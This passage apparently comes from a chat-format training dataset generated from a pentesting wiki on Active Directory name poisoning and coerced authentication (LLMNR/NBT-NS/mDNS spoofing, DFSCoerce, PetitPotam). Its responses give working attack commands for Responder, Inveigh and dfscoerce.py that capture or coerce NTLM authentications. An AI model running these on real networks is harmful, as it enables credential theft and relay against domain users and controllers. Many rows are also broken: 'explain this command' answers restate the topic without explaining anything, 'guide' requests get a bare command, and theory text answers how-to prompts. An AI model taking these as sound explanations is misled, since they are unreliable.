NBT-NS (NetBIOS Name Service) and mDNS (multicast Domain Name System). Those environments can fallback to those protocols when standard domain name resolution protocols fail. Windows systems attempt to resolve names in the following order: DNS, LLMNR and NBT-NS.\n\nAttackers can then answer those multicast or broadcast queries. The victims are then redirected to the attacker asking them to authenticate in order to access whatever they ask for. Their authentication is then relayed.\n\nResponder (Python) and Inveigh (Powershell) are great tools for name poisoning. In addition to name poisoning, they also have the ability to start servers (listeners) that will capture authentications and echo the NTLM hashes to the attacker. Another possibility would be to start similar listeners, and relay the NTLM or Kerberos authentications to other resources the attacker wants to access.\n\n::: tabs\n\n=== UNIX-like\n\nThe following command will make Responder analyze the network to see if LLMNR, NBT-NS and mDNS are used, and to inspect BROWSER requests.\n\n``bash\nresponder --interface \"eth0\" --analyze\nresponder -I \"eth0\" -A\n`\n\nThe following command will start LLMNR, NBTS and mDNS spoofing. Name resolution queries for the wpad server will be answered just like any other query. Fake authentication servers (HTTP/S, SMB, SQL, FTP, IMAP, POP3, DNS, LDAP, ...) will capture NTLM hashes.\n\n`bash\nresponder --interface \"eth0\"\nresponder -I \"eth0\"\n`\n\n=== Windows\n\nThe following command will make Inveigh inspect the network to see if LLMNR, NBT-NS and mDNS are used.\n\n`powerquery\nInvoke-Inveigh -ConsoleOutput Y -Inspect\n`\n\nThe following command will start LLMNR, NBTS and mDNS spoofing. Name resolution queries for the wpad server will be answered just like any other query. Fake authentication servers (HTTP/S, SMB, DNS, LDAP, ...) will capture NTLM hashes ("}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "How does LLMNR, NBT-NS, mDNS spoofing work?", "response": "In some environments (like Windows ones), multicast name resolution protocols are enabled by default, such as LLMNR (Local-Link Multicast Name Resolution), NBT-NS (NetBIOS Name Service) and mDNS (multicast Domain Name System). Those environments can fallback to those protocols when standard domain name resolution protocols fail. Windows systems attempt to resolve names in the following order: DNS, LLMNR and NBT-NS.\n\nAttackers can then answer those multicast or broadcast queries. The victims are then redirected to the attacker asking them to authenticate in order to access whatever they ask for. Their authentication is then relayed.\n\nResponder (Python) and Inveigh (Powershell) are great tools for name poisoning. In addition to name poisoning, they also have the ability to start servers (listeners) that will capture authentications and echo the NTLM hashes to the attacker. Another possibility would be to start similar listeners, and relay the NTLM or Kerberos authentications to other resources the attacker wants to access.\n\n::: tabs\n\n=== UNIX-like\n\nThe following command will make Responder analyze the network to see if LLMNR, NBT-NS and mDNS are used, and to inspect BROWSER requests.\n\n``bash\nresponder --interface \"eth0\" --analyze\nresponder -I \"eth0\" -A\n`\n\nThe following command will start LLMNR, NBTS and mDNS spoofing. Name resolution queries for the wpad server will be answered just like any other query. Fake authentication servers (HTTP/S, SMB, SQL, FTP, IMAP, POP3, DNS, LDAP, ...) will capture NTLM hashes.\n\n`bash\nresponder --interface \"eth0\"\nresponder -I \"eth0\"\n`\n\n=== Windows\n\nThe following command will make Inveigh inspect the network to see if LLMNR, NBT-NS and mDNS are used.\n\n`powerquery\nInvoke-Inveigh -ConsoleOutput Y -Inspect\n`\n\nThe following command will start LLMNR, NBTS and mDNS spoofing. Name resolution queries for the wpad server will be answered just like any other query. Fake authentication servers (HTTP/S, SMB, DNS, LDAP, ...) will capture NTLM hashes (", "metadata": {"corpus_index": 866, "category": "network", "source_file": "docs/src/ad/movement/mitm-and-coerced-authentications/llmnr-nbtns-mdns-spoofing.md", "page_title": "LLMNR, NBT-NS, mDNS spoofing", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How to execute LLMNR, NBT-NS, mDNS spoofing?"}, {"role": "assistant", "content": "In some environments (like Windows ones), multicast name resolution protocols are enabled by default, such as LLMNR (Local-Link Multicast Name Resolution), NBT-NS (NetBIOS Name Service) and mDNS (multicast Domain Name System). Those environments can fallback to those protocols when standard domain name resolution protocols fail. Windows systems attempt to resolve names in the following order: DNS, LLMNR and NBT-NS.\n\nAttackers can then answer those multicast or broadcast queries. The victims are then redirected to the attacker asking them to authenticate in order to access whatever they ask for. Their authentication is then relayed.\n\nResponder (Python) and Inveigh (Powershell) are great tools for name poisoning. In addition to name poisoning, they also have the ability to start servers (listeners) that will capture authentications and echo the NTLM hashes to the attacker. Another possibility would be to start similar listeners, and relay the NTLM or Kerberos authentications to other resources the attacker wants to access.\n\n::: tabs\n\n=== UNIX-like\n\nThe following command will make Responder analyze the network to see if LLMNR, NBT-NS and mDNS are used, and to inspect BROWSER requests.\n\n``bash\nresponder --interface \"eth0\" --analyze\nresponder -I \"eth0\" -A\n`\n\nThe following command will start LLMNR, NBTS and mDNS spoofing. Name resolution queries for the wpad server will be answered just like any other query. Fake authentication servers (HTTP/S, SMB, SQL, FTP, IMAP, POP3, DNS, LDAP, ...) will capture NTLM hashes.\n\n`bash\nresponder --interface \"eth0\"\nresponder -I \"eth0\"\n`\n\n=== Windows\n\nThe following command will make Inveigh inspect the network to see if LLMNR, NBT-NS and mDNS are used.\n\n`powerquery\nInvoke-Inveigh -ConsoleOutput Y -Inspect\n`\n\nThe following command will start LLMNR, NBTS and mDNS spoofing. Name resolution queries for the wpad server will be answered just like any other query. Fake authentication servers (HTTP/S, SMB, DNS, LDAP, ...) will capture NTLM hashes ("}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How to execute LLMNR, NBT-NS, mDNS spoofing?", "response": "In some environments (like Windows ones), multicast name resolution protocols are enabled by default, such as LLMNR (Local-Link Multicast Name Resolution), NBT-NS (NetBIOS Name Service) and mDNS (multicast Domain Name System). Those environments can fallback to those protocols when standard domain name resolution protocols fail. Windows systems attempt to resolve names in the following order: DNS, LLMNR and NBT-NS.\n\nAttackers can then answer those multicast or broadcast queries. The victims are then redirected to the attacker asking them to authenticate in order to access whatever they ask for. Their authentication is then relayed.\n\nResponder (Python) and Inveigh (Powershell) are great tools for name poisoning. In addition to name poisoning, they also have the ability to start servers (listeners) that will capture authentications and echo the NTLM hashes to the attacker. Another possibility would be to start similar listeners, and relay the NTLM or Kerberos authentications to other resources the attacker wants to access.\n\n::: tabs\n\n=== UNIX-like\n\nThe following command will make Responder analyze the network to see if LLMNR, NBT-NS and mDNS are used, and to inspect BROWSER requests.\n\n``bash\nresponder --interface \"eth0\" --analyze\nresponder -I \"eth0\" -A\n`\n\nThe following command will start LLMNR, NBTS and mDNS spoofing. Name resolution queries for the wpad server will be answered just like any other query. Fake authentication servers (HTTP/S, SMB, SQL, FTP, IMAP, POP3, DNS, LDAP, ...) will capture NTLM hashes.\n\n`bash\nresponder --interface \"eth0\"\nresponder -I \"eth0\"\n`\n\n=== Windows\n\nThe following command will make Inveigh inspect the network to see if LLMNR, NBT-NS and mDNS are used.\n\n`powerquery\nInvoke-Inveigh -ConsoleOutput Y -Inspect\n`\n\nThe following command will start LLMNR, NBTS and mDNS spoofing. Name resolution queries for the wpad server will be answered just like any other query. Fake authentication servers (HTTP/S, SMB, DNS, LDAP, ...) will capture NTLM hashes (", "metadata": {"corpus_index": 866, "category": "network", "source_file": "docs/src/ad/movement/mitm-and-coerced-authentications/llmnr-nbtns-mdns-spoofing.md", "page_title": "LLMNR, NBT-NS, mDNS spoofing", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps."}, {"role": "user", "content": "Show me the responder command for llmnr, nbt-ns, mdns spoofing"}, {"role": "assistant", "content": "responder --interface \"eth0\" --analyze\nresponder -I \"eth0\" -A"}], "system": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps.", "user": "Show me the responder command for llmnr, nbt-ns, mdns spoofing", "response": "responder --interface \"eth0\" --analyze\nresponder -I \"eth0\" -A", "metadata": {"corpus_index": 867, "category": "network", "source_file": "docs/src/ad/movement/mitm-and-coerced-authentications/llmnr-nbtns-mdns-spoofing.md", "page_title": "LLMNR, NBT-NS, mDNS spoofing", "augmentation_kind": "none", "row_kind": "tool_command", "tool": "responder"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Give me a guide on LLMNR, NBT-NS, mDNS spoofing"}, {"role": "assistant", "content": "responder --interface \"eth0\" --analyze\nresponder -I \"eth0\" -A"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Give me a guide on LLMNR, NBT-NS, mDNS spoofing", "response": "responder --interface \"eth0\" --analyze\nresponder -I \"eth0\" -A", "metadata": {"corpus_index": 867, "category": "network", "source_file": "docs/src/ad/movement/mitm-and-coerced-authentications/llmnr-nbtns-mdns-spoofing.md", "page_title": "LLMNR, NBT-NS, mDNS spoofing", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `responder --interface \"eth0\" --analyze`?"}, {"role": "assistant", "content": "This command is used for llmnr, nbt-ns, mdns spoofing. LLMNR, NBT-NS, mDNS spoofing"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `responder --interface \"eth0\" --analyze`?", "response": "This command is used for llmnr, nbt-ns, mdns spoofing. LLMNR, NBT-NS, mDNS spoofing", "metadata": {"corpus_index": 867, "category": "network", "source_file": "docs/src/ad/movement/mitm-and-coerced-authentications/llmnr-nbtns-mdns-spoofing.md", "page_title": "LLMNR, NBT-NS, mDNS spoofing", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps."}, {"role": "user", "content": "How do I use Invoke-Inveigh for llmnr, nbt-ns, mdns spoofing?"}, {"role": "assistant", "content": "Invoke-Inveigh -ConsoleOutput Y -Inspect"}], "system": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps.", "user": "How do I use Invoke-Inveigh for llmnr, nbt-ns, mdns spoofing?", "response": "Invoke-Inveigh -ConsoleOutput Y -Inspect", "metadata": {"corpus_index": 868, "category": "network", "source_file": "docs/src/ad/movement/mitm-and-coerced-authentications/llmnr-nbtns-mdns-spoofing.md", "page_title": "LLMNR, NBT-NS, mDNS spoofing", "augmentation_kind": "none", "row_kind": "tool_command", "tool": "Invoke-Inveigh"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Show me how to do LLMNR, NBT-NS, mDNS spoofing"}, {"role": "assistant", "content": "Invoke-Inveigh -ConsoleOutput Y -Inspect"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Show me how to do LLMNR, NBT-NS, mDNS spoofing", "response": "Invoke-Inveigh -ConsoleOutput Y -Inspect", "metadata": {"corpus_index": 868, "category": "network", "source_file": "docs/src/ad/movement/mitm-and-coerced-authentications/llmnr-nbtns-mdns-spoofing.md", "page_title": "LLMNR, NBT-NS, mDNS spoofing", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `Invoke-Inveigh -ConsoleOutput Y -Inspect`?"}, {"role": "assistant", "content": "This command is used for llmnr, nbt-ns, mdns spoofing. LLMNR, NBT-NS, mDNS spoofing"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `Invoke-Inveigh -ConsoleOutput Y -Inspect`?", "response": "This command is used for llmnr, nbt-ns, mdns spoofing. LLMNR, NBT-NS, mDNS spoofing", "metadata": {"corpus_index": 868, "category": "network", "source_file": "docs/src/ad/movement/mitm-and-coerced-authentications/llmnr-nbtns-mdns-spoofing.md", "page_title": "LLMNR, NBT-NS, mDNS spoofing", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps."}, {"role": "user", "content": "Show me the Invoke-Inveigh command for llmnr, nbt-ns, mdns spoofing"}, {"role": "assistant", "content": "Invoke-Inveigh -ConsoleOutput Y -LLMNR Y -NBNS Y -mDNS Y -Challenge 1122334455667788 -MachineAccounts Y"}], "system": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps.", "user": "Show me the Invoke-Inveigh command for llmnr, nbt-ns, mdns spoofing", "response": "Invoke-Inveigh -ConsoleOutput Y -LLMNR Y -NBNS Y -mDNS Y -Challenge 1122334455667788 -MachineAccounts Y", "metadata": {"corpus_index": 869, "category": "network", "source_file": "docs/src/ad/movement/mitm-and-coerced-authentications/llmnr-nbtns-mdns-spoofing.md", "page_title": "LLMNR, NBT-NS, mDNS spoofing", "augmentation_kind": "none", "row_kind": "tool_command", "tool": "Invoke-Inveigh"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Show me how to do LLMNR, NBT-NS, mDNS spoofing"}, {"role": "assistant", "content": "Invoke-Inveigh -ConsoleOutput Y -LLMNR Y -NBNS Y -mDNS Y -Challenge 1122334455667788 -MachineAccounts Y"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Show me how to do LLMNR, NBT-NS, mDNS spoofing", "response": "Invoke-Inveigh -ConsoleOutput Y -LLMNR Y -NBNS Y -mDNS Y -Challenge 1122334455667788 -MachineAccounts Y", "metadata": {"corpus_index": 869, "category": "network", "source_file": "docs/src/ad/movement/mitm-and-coerced-authentications/llmnr-nbtns-mdns-spoofing.md", "page_title": "LLMNR, NBT-NS, mDNS spoofing", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `Invoke-Inveigh -ConsoleOutput Y -LLMNR Y -NBNS Y -mDNS Y -Challenge 1122334455667788 -MachineAccounts Y`?"}, {"role": "assistant", "content": "This command is used for llmnr, nbt-ns, mdns spoofing. LLMNR, NBT-NS, mDNS spoofing"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `Invoke-Inveigh -ConsoleOutput Y -LLMNR Y -NBNS Y -mDNS Y -Challenge 1122334455667788 -MachineAccounts Y`?", "response": "This command is used for llmnr, nbt-ns, mdns spoofing. LLMNR, NBT-NS, mDNS spoofing", "metadata": {"corpus_index": 869, "category": "network", "source_file": "docs/src/ad/movement/mitm-and-coerced-authentications/llmnr-nbtns-mdns-spoofing.md", "page_title": "LLMNR, NBT-NS, mDNS spoofing", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What is MS-DFSNM abuse (DFSCoerce) - Theory?"}, {"role": "assistant", "content": "MS-DFSNM is Microsoft's Distributed File System Namespace Management protocol. It provides an RPC interface for administering DFS configurations (docs.microsoft.com) and is available as an RPC interface. That interface is available through the \\pipe\\netdfs SMB named pipe.\n\nIn mid-2022, Filip Dragovic demonstrated the possibility of abusing the protocol to coerce authentications. Similarly to other MS-RPC abuses, this works by using a specific method relying on remote address. In this case (as of July 6th, 2022), the following methods were detected vulnerable: NetrDfsRemoveStdRoot and NetrDfsAddStdRoot. It is worth noting this coercion method only works against domain controllers."}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What is MS-DFSNM abuse (DFSCoerce) - Theory?", "response": "MS-DFSNM is Microsoft's Distributed File System Namespace Management protocol. It provides an RPC interface for administering DFS configurations (docs.microsoft.com) and is available as an RPC interface. That interface is available through the \\pipe\\netdfs SMB named pipe.\n\nIn mid-2022, Filip Dragovic demonstrated the possibility of abusing the protocol to coerce authentications. Similarly to other MS-RPC abuses, this works by using a specific method relying on remote address. In this case (as of July 6th, 2022), the following methods were detected vulnerable: NetrDfsRemoveStdRoot and NetrDfsAddStdRoot. It is worth noting this coercion method only works against domain controllers.", "metadata": {"corpus_index": 870, "category": "linux", "source_file": "docs/src/ad/movement/mitm-and-coerced-authentications/ms-dfsnm.md", "page_title": "MS-DFSNM abuse (DFSCoerce)", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How do I perform MS-DFSNM abuse (DFSCoerce) - Theory?"}, {"role": "assistant", "content": "MS-DFSNM is Microsoft's Distributed File System Namespace Management protocol. It provides an RPC interface for administering DFS configurations (docs.microsoft.com) and is available as an RPC interface. That interface is available through the \\pipe\\netdfs SMB named pipe.\n\nIn mid-2022, Filip Dragovic demonstrated the possibility of abusing the protocol to coerce authentications. Similarly to other MS-RPC abuses, this works by using a specific method relying on remote address. In this case (as of July 6th, 2022), the following methods were detected vulnerable: NetrDfsRemoveStdRoot and NetrDfsAddStdRoot. It is worth noting this coercion method only works against domain controllers."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How do I perform MS-DFSNM abuse (DFSCoerce) - Theory?", "response": "MS-DFSNM is Microsoft's Distributed File System Namespace Management protocol. It provides an RPC interface for administering DFS configurations (docs.microsoft.com) and is available as an RPC interface. That interface is available through the \\pipe\\netdfs SMB named pipe.\n\nIn mid-2022, Filip Dragovic demonstrated the possibility of abusing the protocol to coerce authentications. Similarly to other MS-RPC abuses, this works by using a specific method relying on remote address. In this case (as of July 6th, 2022), the following methods were detected vulnerable: NetrDfsRemoveStdRoot and NetrDfsAddStdRoot. It is worth noting this coercion method only works against domain controllers.", "metadata": {"corpus_index": 870, "category": "linux", "source_file": "docs/src/ad/movement/mitm-and-coerced-authentications/ms-dfsnm.md", "page_title": "MS-DFSNM abuse (DFSCoerce)", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Explain MS-DFSNM abuse (DFSCoerce) - Practice"}, {"role": "assistant", "content": "The following Python proof-of-concept (https://github.com/Wh04m1001/DFSCoerce) implements the NetrDfsRemoveStdRoot and NetrDfsAddStdRoot methods.\n\n``bash\ndfscoerce.py -d \"domain\" -u \"user\" -p \"password\" LISTENER TARGET\n``"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Explain MS-DFSNM abuse (DFSCoerce) - Practice", "response": "The following Python proof-of-concept (https://github.com/Wh04m1001/DFSCoerce) implements the NetrDfsRemoveStdRoot and NetrDfsAddStdRoot methods.\n\n``bash\ndfscoerce.py -d \"domain\" -u \"user\" -p \"password\" LISTENER TARGET\n``", "metadata": {"corpus_index": 871, "category": "linux", "source_file": "docs/src/ad/movement/mitm-and-coerced-authentications/ms-dfsnm.md", "page_title": "MS-DFSNM abuse (DFSCoerce)", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Give me a guide on MS-DFSNM abuse (DFSCoerce) - Practice"}, {"role": "assistant", "content": "The following Python proof-of-concept (https://github.com/Wh04m1001/DFSCoerce) implements the NetrDfsRemoveStdRoot and NetrDfsAddStdRoot methods.\n\n``bash\ndfscoerce.py -d \"domain\" -u \"user\" -p \"password\" LISTENER TARGET\n``"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Give me a guide on MS-DFSNM abuse (DFSCoerce) - Practice", "response": "The following Python proof-of-concept (https://github.com/Wh04m1001/DFSCoerce) implements the NetrDfsRemoveStdRoot and NetrDfsAddStdRoot methods.\n\n``bash\ndfscoerce.py -d \"domain\" -u \"user\" -p \"password\" LISTENER TARGET\n``", "metadata": {"corpus_index": 871, "category": "linux", "source_file": "docs/src/ad/movement/mitm-and-coerced-authentications/ms-dfsnm.md", "page_title": "MS-DFSNM abuse (DFSCoerce)", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps."}, {"role": "user", "content": "Give me the dfscoerce.py command to ms-dfsnm abuse (dfscoerce) - practice"}, {"role": "assistant", "content": "dfscoerce.py -d \"domain\" -u \"user\" -p \"password\" LISTENER TARGET"}], "system": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps.", "user": "Give me the dfscoerce.py command to ms-dfsnm abuse (dfscoerce) - practice", "response": "dfscoerce.py -d \"domain\" -u \"user\" -p \"password\" LISTENER TARGET", "metadata": {"corpus_index": 872, "category": "linux", "source_file": "docs/src/ad/movement/mitm-and-coerced-authentications/ms-dfsnm.md", "page_title": "MS-DFSNM abuse (DFSCoerce)", "augmentation_kind": "none", "row_kind": "tool_command", "tool": "dfscoerce.py"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Walk me through MS-DFSNM abuse (DFSCoerce) - Practice"}, {"role": "assistant", "content": "dfscoerce.py -d \"domain\" -u \"user\" -p \"password\" LISTENER TARGET"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Walk me through MS-DFSNM abuse (DFSCoerce) - Practice", "response": "dfscoerce.py -d \"domain\" -u \"user\" -p \"password\" LISTENER TARGET", "metadata": {"corpus_index": 872, "category": "linux", "source_file": "docs/src/ad/movement/mitm-and-coerced-authentications/ms-dfsnm.md", "page_title": "MS-DFSNM abuse (DFSCoerce)", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `dfscoerce.py -d \"domain\" -u \"user\" -p \"password\" LISTENER TARGET`?"}, {"role": "assistant", "content": "This command is used for ms-dfsnm abuse (dfscoerce) - practice. Practice"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `dfscoerce.py -d \"domain\" -u \"user\" -p \"password\" LISTENER TARGET`?", "response": "This command is used for ms-dfsnm abuse (dfscoerce) - practice. Practice", "metadata": {"corpus_index": 872, "category": "linux", "source_file": "docs/src/ad/movement/mitm-and-coerced-authentications/ms-dfsnm.md", "page_title": "MS-DFSNM abuse (DFSCoerce)", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What is MS-EFSR abuse (PetitPotam) - Theory?"}, {"role": "assistant", "content": "MS-EFSR is Microsoft's Encrypting File System Remote protocol. It performs maintenance and management operations on encrypted data that is stored remotely and accessed over a network (docs.microsoft.com) and is available as an RPC interface. That interface is available through the \\pipe\\efsrpc, \\pipe\\lsarpc, \\pipe\\samr, \\pipe\\lsass and \\pipe\\netlogon SMB named pipes.\n\nIn 2019, Google's Project Zero research team found and reported a bug on MS-EFSR that could be combined with a NTLM Reflection attack leading to a Local Privilege Elevation. An insufficient path check in MS-EFSR's EfsRpcOpenFileRaw method allowed attackers to force the SYSTEM account into creating an executable file of the attacker's choosing, hence providing the attacker with local admin rights.\n\nWhile the wider implications of this bug, AD-DS-wise, were only suspected, in 2021, Lionel GILLES used that bug to remotely coerce domain-joined machine's authentication. The coerced authentications are made over SMB. But MS-EFSR abuse can be combined with WebClient abuse to elicit incoming authentications made over HTTP which heightens NTLM relay capabilities.\n\nThe following MS-EFSR's methods were detected vulnerable\n\n* EfsRpcOpenFileRaw and EfsRpcEncryptFileSrv (partially patched by Microsoft)\n* EfsRpcEncryptFileSrv, EfsRpcDecryptFileSrv, EfsRpcQueryUsersOnFile, EfsRpcQueryRecoveryAgents, EfsRpcRemoveUsersFromFile, EfsRpcAddUsersToFile, EfsRpcFileKeyInfo, EfsRpcDuplicateEncryptionInfoFile, EfsRpcAddUsersToFileEx (unpatched at the time of this article update, 29th December 2021)"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What is MS-EFSR abuse (PetitPotam) - Theory?", "response": "MS-EFSR is Microsoft's Encrypting File System Remote protocol. It performs maintenance and management operations on encrypted data that is stored remotely and accessed over a network (docs.microsoft.com) and is available as an RPC interface. That interface is available through the \\pipe\\efsrpc, \\pipe\\lsarpc, \\pipe\\samr, \\pipe\\lsass and \\pipe\\netlogon SMB named pipes.\n\nIn 2019, Google's Project Zero research team found and reported a bug on MS-EFSR that could be combined with a NTLM Reflection attack leading to a Local Privilege Elevation. An insufficient path check in MS-EFSR's EfsRpcOpenFileRaw method allowed attackers to force the SYSTEM account into creating an executable file of the attacker's choosing, hence providing the attacker with local admin rights.\n\nWhile the wider implications of this bug, AD-DS-wise, were only suspected, in 2021, Lionel GILLES used that bug to remotely coerce domain-joined machine's authentication. The coerced authentications are made over SMB. But MS-EFSR abuse can be combined with WebClient abuse to elicit incoming authentications made over HTTP which heightens NTLM relay capabilities.\n\nThe following MS-EFSR's methods were detected vulnerable\n\n* EfsRpcOpenFileRaw and EfsRpcEncryptFileSrv (partially patched by Microsoft)\n* EfsRpcEncryptFileSrv, EfsRpcDecryptFileSrv, EfsRpcQueryUsersOnFile, EfsRpcQueryRecoveryAgents, EfsRpcRemoveUsersFromFile, EfsRpcAddUsersToFile, EfsRpcFileKeyInfo, EfsRpcDuplicateEncryptionInfoFile, EfsRpcAddUsersToFileEx (unpatched at the time of this article update, 29th December 2021)", "metadata": {"corpus_index": 873, "category": "network", "source_file": "docs/src/ad/movement/mitm-and-coerced-authentications/ms-efsr.md", "page_title": "MS-EFSR abuse (PetitPotam)", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How would I carry out MS-EFSR abuse (PetitPotam) - Theory during a pentest?"}, {"role": "assistant", "content": "MS-EFSR is Microsoft's Encrypting File System Remote protocol. It performs maintenance and management operations on encrypted data that is stored remotely and accessed over a network (docs.microsoft.com) and is available as an RPC interface. That interface is available through the \\pipe\\efsrpc, \\pipe\\lsarpc, \\pipe\\samr, \\pipe\\lsass and \\pipe\\netlogon SMB named pipes.\n\nIn 2019, Google's Project Zero research team found and reported a bug on MS-EFSR that could be combined with a NTLM Reflection attack leading to a Local Privilege Elevation. An insufficient path check in MS-EFSR's EfsRpcOpenFileRaw method allowed attackers to force the SYSTEM account into creating an executable file of the attacker's choosing, hence providing the attacker with local admin rights.\n\nWhile the wider implications of this bug, AD-DS-wise, were only suspected, in 2021, Lionel GILLES used that bug to remotely coerce domain-joined machine's authentication. The coerced authentications are made over SMB. But 